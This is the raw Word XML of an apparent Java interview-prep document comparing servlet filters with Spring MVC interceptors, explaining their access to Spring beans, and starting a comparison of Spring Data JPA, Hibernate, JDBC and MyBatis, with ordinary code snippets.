    <w:p w14:paraId="22E03BB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IOException, ServletException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6025C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76967A5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 // Pass control to the next filter or servlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E0522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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BC16B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0FBFD94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DFE2844"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implemented using the HandlerInterceptor interface in Spring MVC and override methods such as preHandle(), postHandle(), and afterCompletion().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5BA58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8E8EF7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Interceptor implements HandlerInterceptor {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B36E1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36FF39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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E1B78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Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464AD3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3F8E2E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 // true to continue request processing, false to stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA9FD5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6950B2" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53497ED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5934D6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postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0D3F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ModelAndView modelAndView) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51F40B"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 after controller method is called</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350C3C6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31767012" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B639E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14D84B2E"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afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C8EBA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xception ex) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04DAC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final cleanup after response is sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584ADD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B2876E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A65F8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7. Order of Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FFC5E6"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executed in the order they are configured in the web.xml (or using annotations) before reaching the Spring DispatcherServlet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4357F61A"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8. Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ABA86B"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typically used for cross-cutting concerns like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0868F4E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 encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D880834"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AF74E8"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and authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34249CB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ssion management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9D917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ching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E272C5"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typically used for concerns related to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controller lifecycle like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1859E92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processing and post-processing model data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C53359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 and response data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3CD92C"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curity checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C64409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odifying the request before it reaches the controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0F490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735"/>
        <w:gridCol w:w="4713"/>
      </w:tblGrid>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="7776C91B" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E729A9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5DA274E4"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ilter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C6B3255"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terceptor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="65BCBA2C" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="230E16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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E70093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ervlet API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B1F95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pring MVC framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="365CF08C" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="143F25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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="557BEE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Response lifecycle at the servlet level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E67921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roller handling lifecycle in Spring MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="0DE9D7A7" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2685036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ecution Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57E13A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reaching DispatcherServlet and after it</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="769D5C4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and after controller method execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="1B0EA19A" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F02DCA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figuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BD7312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web.xml or annotations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="598694F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Spring context or @Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="5691A0D3" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B5A55C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thods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="739A96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oFilter()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C9BF84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Handle(), postHandle(), afterCompletion()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="024AABF3" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BD3AC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mon Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7287A92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logging, session management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5971EAD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response modification, security, validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="6F485D62" w14:textId="77777777" w:rsidTr="00644808">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05B3301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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4648BF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request/response level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FECECE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controller and model level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46337D4D"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05AC0D3"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work at a lower level, managing the entire request-response lifecycle and are often used for generic concerns like security and logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A42DEC"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ecific to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operating during the controller processing phase, and are primarily used for tasks like model manipulation, logging, and pre/post processing of controller methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A7787A" w14:textId="182B383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24" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="783997C1" w14:textId="69E386A1" w:rsidR="006164D4" w:rsidRPr="00CE4B95" w:rsidRDefault="008467E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="463" w:name="_Toc197867677"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which one has access to spring beans, interceptors or filters</w:t>
      </w:r>
      <w:r w:rsidR="006164D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="463"/>
    </w:p>
    <w:p w14:paraId="3CACEAFE" w14:textId="00019B66" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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access to Spring beans, wherea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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BFF0C2"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E841E30"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a service or repository inside an interceptor, you can inject it via constructor injection or field injection, just like any other Spring bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC5ECD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2A1AC620"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public class MyInterceptor implements HandlerInterceptor {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602F75F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17CC80D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1B78376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DF1A508"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6A551C77"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throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31E51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can use myService here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F41E2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFF455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2148E1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299D21D7"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Spring beans inside a filter, you can manually obtain the Spring context, but this approach is less elegant and not the recommended way to use Spring beans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E6A1B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2BD6379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541F03C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44E1C3E9" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2425A5D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535763D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throws IOException, ServletException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9F4225"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Access to Spring beans is not directly available here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB9610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would need to use something like SpringContextUtils to get the context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CB3BDB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C407E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26F8CA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7C7469F6"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19120D83"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direct access to Spring beans because they are part of the Spring MVC lifecycle and are Spring-managed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649D19E7"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25" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F97A66A" w14:textId="07B3255F" w:rsidR="006164D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00E926D5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="464" w:name="_Toc197867678"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why do interceptors have access to Spring beans</w:t>
      </w:r>
      <w:r w:rsidR="006164D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="464"/>
    </w:p>
    <w:p w14:paraId="20769D4B" w14:textId="74811E46" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3"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have access to Spring beans because they are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and are managed by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Let's break this down to understand why this is the case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D01BE"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managed Components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B8920B"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Integration with Spring MVC Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5268DE67"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are integrated into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC request handling process</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. When a request is processed by the DispatcherServlet, Spring interceptors can act on that request before and after the controller method is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C28E66B"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3. Spring Bean Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22655299"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interceptors are Spring beans, they are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Bean lifecycle</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This means that Spring manages the instantiation of interceptors, and dependency injection occurs just as it does for other beans in the Spring context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241E7FF7"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Why Filters Don’t Have Access to Spring Beans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AF1626"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contrast to interceptor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re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Why Interceptors Have Access to Spring Beans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC90C41"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 are Spring-managed beans</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning they are created, configured, and managed by the Spring IoC container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E7E405"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they are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC lifecycle</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, they can utilize the dependency injection system (like autowiring) to get access to other Spring beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58235574"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26" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34338CAD" w14:textId="5A54D251" w:rsidR="006164D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00F618CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="465" w:name="_Toc197867679"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Spring data JPA, Hibernate, JDBC, My batis</w:t>
      </w:r>
      <w:r w:rsidR="006164D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="465"/>
    </w:p>
    <w:p w14:paraId="7D6A99E4" w14:textId="05590E48" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D"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ere’s a comparison of </w:t>
      </w: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xml:space="preserve"> to help understand their differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9EB277"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 Data JPA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C317C2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Spring Data JPA is a part of the larger Spring Data project and simplifies working with </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA (Java Persistence API)</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, making it easier to interact with relational databases using </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>object-relational mapping (ORM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21741CC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7E803AB4"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n abstraction layer over JPA, reducing boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185911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ally generates queries based on method names (e.g., findByName(), findByAgeGreaterThan()) using the JpaRepository interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0A4D5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JPA providers</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lik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EclipseLink</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OpenJPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for ORM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2246AA20"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the creation of custom queries with JPQL (Java Persistence Query Language) or native SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF95017"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seamlessly with Spring and Spring Boot for easy integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76823A40"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7D01966B"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leverage the power of JPA (ORM) and Spring together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F479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reduce boilerplate code for CRUD operations, queries, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEF0CAA"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6C5E1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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005A5CC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mployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A5CAB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ist&lt;Employee&gt; findByName(String name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645F479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364B5EE7"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0D4A9">
          <v:rect id="_x0000_i2127" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="048489F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Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAE0F4A"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Hibernate is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that provides ORM capabilities to map Java objects to database tables. It is one of the most popular JPA providers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8D7110"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40372AE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 full-fledged ORM framework with advanced features such as lazy loading, caching, and session management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F76EE8A"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directly with JPA annotations for object-to-database mapping.</w:t>
      </w:r>
    </w:p>
